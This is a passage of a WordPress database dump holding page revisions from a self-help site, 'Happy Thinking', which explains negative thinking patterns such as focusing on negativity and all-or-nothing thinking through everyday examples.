-->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/patternrecognition170623a.gif" alt="" class="wp-image-1883"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>When describing negative thinking, I will use certain examples to make things clear. However, to keep this website readable, I have often made these examples somewhat simplistic and they may not always exactly match your circumstances, so please add some imagination to make my examples more relevant to you.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please note that in the first section of this website, I will not mention any of the mental methods that you can use to deal with negative thinking. It would make more sense to learn about them after you understand the various types of negative thinking, as then you will be able to better appreciate how to use the methods. So as you read about the types of negative thinking, please do not think that I have forgotten to tell you about the various methods! I promise I will share them with you later.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finally do not try to understand and remember every type of negative thinking in one go. A lot of people think that by speed reading and clicking through pages, they would miraculously end up becoming happier. Unfortunately, by going too fast, the information will just bounce off oneâ€™s mind, rather than interacting with it.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1885,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/toofast_170623.jpg" alt="" class="wp-image-1885"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Like lots of things, you need to go slow so that you can appreciate and digest knowledge. This website will always be there for you, so take as long as you like to read it. You are always welcome to keep visiting here.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let''s move on to understand common types of negative thinking. Letâ€™s see how many will be relevant to you! In my case, I could recognise many of them in my own mind.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-21 15:25:18', '2023-06-21 15:25:18', '', 1034, 'https://www.happythinking.com/?p=1934', 0, 'revision', '', 0),
(1936, 1, '2023-06-21 15:28:18', '2023-06-21 15:28:18', '<!-- wp:paragraph -->\n<p>Letâ€™s now start getting to know the various types of negative thinking that people do. The first one is what I call â€œfocusing on negativityâ€. This is a very common type of negative thinking and is an important one to understand as it may contribute to one becoming depressed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In oneâ€™s day-to-day life, one faces various events. Some of these events may be â€œpositiveâ€ (e.g. one has been told that there will be a salary increase at work) and others may be â€œnegativeâ€ (e.g. one has lost oneâ€™s expensive mobile phone).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1829,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/twospheres_160623.jpg" alt="" class="wp-image-1829"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, oneâ€™s mind may do the negative thinking of excessively focusing on negative events while mostly ignoring positive events. In the example I gave, the person may excessively focus on the negative event of losing the mobile phone, while mostly ignoring the â€œhappyâ€ event of having a salary increase. This type of negative thinking can make one feel that things are worse than they really are as positive events that could have countered the negativity are ignored.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I call this type of negative thinking, â€œfocusing on negativityâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1834,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unbalanced_160623.jpg" alt="" class="wp-image-1834"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A more â€œhelpfulâ€ way to think would have been to see both the positive and negative events in a more balanced way. Perhaps thinking, â€œYes, itâ€™s upsetting that I lost my expensive mobile phone, but on the brighter side, I got a nice salary raise at workâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1835,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/balanced_160623.jpg" alt="" class="wp-image-1835"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>It is possible that the human brain has an inbuilt tendency to think in negative ways. This tendency may have been inherited from our ancestors from many thousands of years ago when they would have lived in forests. In such an environment, oneâ€™s survival would have depended on â€œrememberingâ€ negative events. For example, imagine that one of our ancestors was daydreaming and walking without a care in the world, and then accidentally stepped on a tigerâ€™s tail.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1857,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/tigerouch_170623.jpg" alt="" class="wp-image-1857"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>If our ancestor survived the ensuing chase, it would have been in his or her survival interest to not forget the negative event of stepping on a tigerâ€™s tail. By focusing on this negative event, our ancestor would have kept remembering the importance of not daydreaming while walking in the forest! While nowadays most of us donâ€™t walk amongst tigers and other dangers in forests, the tendency to focus on negative events may still persist in our brains.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1858,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/tiger_memory_170623.jpg" alt="" class="wp-image-1858"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Here is a more modern example of the â€œfocusing on negativityâ€ type of negative thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Joe was to take an early morning flight, but unfortunately, because he forgot to set his alarm, he left very late for the airport. At the airport, the ticketing personnel conveyed the sad news to Joe that he had missed his flight. But luckily for Joe, a sympathetic senior manager of the airline felt sorry and issued a free ticket to him for a flight leaving for his destination just a few hours later. While waiting for this next flight, Joe only focussed on the negative event of missing his flight, rather than also taking in the positivity that the free ticket for the next flight gave him. He kept telling himself how unlucky he was to have forgotten to set his alarm clock while downplaying the good fortune he had of having a sympathetic airport worker who was able to help him in a big way. The excessive focus on the negative event made him unnecessarily feel very sad about his situation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>As you can see, to prevent unnecessary sadness, itâ€™s important to recognise when you are excessively focusing on negative events. As I mentioned before, Happy Thinking is about dealing with such negative thinking. Once we have gone over the common types of negative thinking, I will share with you tools that you can use to deal with such thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/catastrophic-thinking/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Focusing on Negativity', '', 'inherit', 'closed', 'closed', '', '1616-revision-v1', '', '', '2023-06-21 15:28:18', '2023-06-21 15:28:18', '', 1616, 'https://www.happythinking.com/?p=1936', 0, 'revision', '', 0),
(2035, 1, '2023-07-21 08:06:03', '2023-07-21 08:06:03', '', 'happycauldron210623', '', 'inherit', '', 'closed', '', 'happycauldron210623', '', '', '2023-07-21 08:06:03', '2023-07-21 08:06:03', '', 88, 'https://www.happythinking.com/wp-content/uploads/happycauldron210623.jpg', 0, 'attachment', 'image/jpeg', 0),
(2036, 1, '2023-07-21 08:06:09', '2023-07-21 08:06:09', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":2017,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking030723.jpg" alt="" class="wp-image-2017"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This free website will share with you the concept of â€œHappy Thinkingâ€ which can help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way your mind does its â€œthinkingâ€ plays a very important role in your happiness. Over time, your mind may have developed certain ways of thinking that can negatively affect your mental well-being. Such â€œnegative thinkingâ€ is very common and can happen to anyone. You may not even realise that you are thinking in such ways. If you are to achieve the best possible happiness in your life, it is important to recognise and change negative thinking when it happens to you.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On this free website, I will describe to you the common types of negative thinking that people do. This will help you to recognise negative thinking when it happens to you. I will also explain to you various mental methods that you can use to deal with negative thinking. Such mental methods will be very practical so that you will be able to use them in your daily life.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to describing negative thinking and giving methods to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>These three ingredients, i.e. recognising negative thinking, using mental methods to deal with it and using wisdom to see the world differently, together make the concept of â€œHappy Thinkingâ€. I am confident that practising happy thinking will help you to find happiness in your life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2035,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/happycauldron210623.jpg" alt="" class="wp-image-2035"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>This website on happy thinking is truly free for you (and your family and friends!) to benefit from. There is nothing to buy, download, register or any other sales tactics. All I wish is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing negative thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-07-21 08:06:09', '2023-07-21 08:06:09', '', 88, 'https://www.happythinking.com/?p=2036', 0, 'revision', '', 0);
INSERT INTO `wpou_posts` VALUES
(2034, 1, '2023-07-21 06:58:34', '2023-07-21 06:58:34', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":2017,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking030723.jpg" alt="" class="wp-image-2017"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This free website will share with you the concept of â€œHappy Thinkingâ€ which can help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way your mind does its â€œthinkingâ€ plays a very important role in your happiness. Over time, your mind may have developed certain ways of thinking that can negatively affect your mental well-being. Such â€œnegative thinkingâ€ is very common and can happen to anyone. You may not even realise that you are thinking in such ways. If you are to achieve the best possible happiness in your life, it is important to recognise and change negative thinking when it happens to you.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On this free website, I will describe to you the common types of negative thinking that people do. This will help you to recognise negative thinking when it happens to you. I will also explain to you various mental methods that you can use to deal with negative thinking. Such mental methods will be very practical so that you will be able to use them in your daily life.Â Â </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to describing negative thinking and giving methods to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>These three ingredients, i.e. recognising negative thinking, using mental methods to deal with it and using wisdom to see the world differently, together make the concept of â€œHappy Thinkingâ€. I am confident that practising happy thinking will help you to find happiness in your life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1868,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/happycauldron170623.jpg" alt="" class="wp-image-1868"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>This website on happy thinking is truly free for you (and your family and friends!) to benefit from. There is nothing to buy, download, register or any other sales tactics. All I wish is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing negative thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-07-21 06:58:34', '2023-07-21 06:58:34', '', 88, 'https://www.happythinking.com/?p=2034', 0, 'revision', '', 0),
(2054, 1, '2023-08-06 16:59:11', '2023-08-06 16:59:11', '', 'cauldron_060823', '', 'inherit', '', 'closed', '', 'cauldron_060823', '', '', '2023-08-06 16:59:11', '2023-08-06 16:59:11', '', 88, 'https://www.happythinking.com/wp-content/uploads/cauldron_060823.jpg', 0, 'attachment', 'image/jpeg', 0),
(2038, 1, '2023-07-21 08:18:03', '2023-07-21 08:18:03', '', 'unhappycloudsface_21_7_2023', '', 'inherit', '', 'closed', '', 'unhappycloudsface_21_7_2023', '', '', '2023-07-21 08:18:03', '2023-07-21 08:18:03', '', 1034, 'https://www.happythinking.com/wp-content/uploads/unhappycloudsface_21_7_2023.jpg', 0, 'attachment', 'image/jpeg', 0),
(2042, 1, '2023-07-21 08:54:55', '2023-07-21 08:54:55', '<!-- wp:paragraph -->\n<p>I am sure that you have a desire to be happy. After all, that is probably why you are visiting this website with the name â€œHappy Thinkingâ€! Unfortunately, as you know, the world you and I live in is full of stress and problems, which at times can make it challenging to find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2038,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unhappycloudsface_21_7_2023.jpg" alt="" class="wp-image-2038"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>However, while you may not be able to always control the things happening around you, one thing you can control is how your mind â€œthinksâ€. The â€œway you thinkâ€ can determine if the problems you face make you remain happy or become unhappy. The ultimate goal of happy thinking is to help you to think in ways that allow you to be happy despite the problems around you. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>To better understand how "the way one thinks" can affect one''s happiness, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2039,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/two_unhappy_faces_21_7_2023.jpg" alt="" class="wp-image-2039"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>However, when facing this stressful situation, let''s imagine that the two people think differently to each other.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of them might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this personâ€™s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult. Despite facing the same stress, one personâ€™s way of thinking made him or her remain happy while the other person''s way of thinking made that person unhappy. Two different outcomes, just by thinking differently.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2040,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/one_unhappy_faces_21_7_2023.jpg" alt="" class="wp-image-2040"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Over your life, you may have developed negative ways of thinking that can unnecessarily cause you to have a negative, unhappy mental state. Such â€œnegative thinkingâ€ can create problems when none actually exists or if there are real problems, may make them negatively affect you more than they should (like in the example we just described). You may have developed the habit of thinking in such negative ways so gradually that you may not even realise that you are thinking in such ways. Happy thinking is about changing negative thinking, and the first step is to be able to recognise when such thinking occurs in yourself. If you are not able to recognise negative thinking, how can you change it? Therefore, to help you to recognise when negative thinking happens to you, in this website I will describe, in an easy-to-understand way, common types of negative thinking that people do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Of course, once you recognise negative thinking, you will want to change such thinking. To help you with this, I will describe various mental methods that you can use to change negative thinking. I like to think of such methods as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these methods to change your negative thinking. These â€œmethodsâ€ are very practical and you will be able to use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to helping you to recognise and change negative thinking, I will also share with you bits of wisdom about happiness that I have collected from various places. Wisdom can help one to see the world with a different and happier viewpoint. All these ingredients together make Happy Thinking, which will help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the next pages (i.e. first part of this website), I will explain to you in an easy-to-understand way, common types of negative thinking that people do. As you learn about the common types of negative thinking, see which ones are applicable to you and feel free to skim over the ones that seem to be not relevant to you.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1883,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/patternrecognition170623a.gif" alt="" class="wp-image-1883"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Please note that in the first section of this website, I will not mention any of the mental methods that you can use to deal with negative thinking. Those I will share with you after you understand the various types of negative thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finally do not try to understand and remember every type of negative thinking in one go. A lot of people think that by speed reading and clicking through pages, they would miraculously end up becoming happier. Unfortunately, by going too fast, the information will just bounce off oneâ€™s mind, rather than interacting with it.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2041,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/shape_bounce_21_7_23.jpg" alt="" class="wp-image-2041"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Like lots of things, you need to go slow so that you can appreciate and digest knowledge. This website will always be there for you, so take as long as you like to read it. You are always welcome to keep visiting here.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Letâ€™s move on to understand common types of negative thinking. Letâ€™s see how many will be relevant to you! In my case, I could recognise many of them in my own mind.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity-effect/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-07-21 08:54:55', '2023-07-21 08:54:55', '', 1034, 'https://www.happythinking.com/?p=2042', 0, 'revision', '', 0),
(2051, 1, '2023-08-06 15:58:58', '2023-08-06 15:58:58', '<!-- wp:paragraph -->\n<p>The unhelpful thinking pattern that we will discuss on this page is called â€œall or nothing thinkingâ€ which means that one makes extreme judgments on various things, rather than making more balanced â€œin-betweenâ€ judgments. Most things in the world around you are not â€œextremeâ€. There is a good chance that the coffee or tea that you drink at the train station every day doesnâ€™t taste â€œextremely goodâ€ or â€œextremely badâ€. Rather, it is more likely to taste somewhere in between the two extremes. Similarly, your colleagues at your workplace are probably not â€œextremely friendlyâ€ or â€œextremely unfriendlyâ€, but more likely to be somewhere in between. Unfortunately, one may develop an unhelpful thinking pattern that involves one thinking often in extremes (e.g. that coffee is extremely good, my colleagues are extremely bad etc), rather than seeing things in a more realistic â€œin-between wayâ€. Psychologists have named this unhelpful thinking pattern, â€œall or nothingâ€ thinking, where the word â€œallâ€ represents one extreme, and the wordÂ  â€œnothingâ€ represents the other extreme. Psychologists also call this kind of unhelpful thinking, â€œblack and whiteâ€ thinking, implying that one doing all-or-nothing thinking does not think in a more balanced â€œgreyâ€ way.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1877,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/all_cups_170623b.jpg" alt="" class="wp-image-1877"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>All-or-nothing thinking can make you unhappy as it can make you judge situations wrongly. The following short examples will help you to understand how it can cause harm.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Example 1</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Imagine that you have a good friend called Lucy. She has been a true friend to you for many years, sharing your happiness and troubles. Lucy has always gone out of her way to be helpful to you whenever you were in need.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us now imagine that today is your birthday and that Lucy, perhaps because she was busy, forgot to wish you. Now let us suppose that your mind does all-or-nothing thinking. Your mind will think, â€œLucy is a really terrible person who does not care about me at all. How could she forget my birthday, when she knows I like people to wish me? She is completely useless, etc.â€ In this scenario, â€œall-or-nothing thinkingâ€ is making you think only in extremes. You ignore all the good that Lucy has done over the years, and instead, let this one small error made by her, make her â€œall badâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In reality, while it was â€œbadâ€ for Lucy to have forgotten your birthday, it was only one â€œbadâ€ thing among the many more â€œgoodâ€ things she has done for you over the years. So instead of seeing Lucy as â€œcompletely badâ€, a better way would be to see her as being â€œmostly goodâ€ and only â€œslightly badâ€. As you have seen in this example, all-or-nothing thinking can make one judge people unfairly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Example 2</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Anju goes to a restaurant and has a three-course meal. The starters taste fantastic, the main course is equally delicious, and even the dessert is super good. Then at the end, Anju orders a coffee. The waiter brings the coffee and as a special treat, also brings a biscuit to go with it. Anju finds the coffee to be excellent but unfortunately discovers that the biscuit is a little spoiled.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At this point, letâ€™s imagine that Anjuâ€™s mind does all-or-nothing thinking. This makes her focus only on the spoilt biscuit and completely forget that the other parts of the meal were fantastic. Anju complains about the biscuit for the rest of the evening, telling everyone how the meal was completely terrible.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see how, because of all-or-nothing thinking, the restaurant was not judged fairly. This is not to say that the spoilt biscuit should have been ignored. Rather, it is about putting things in the correct perspective.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr 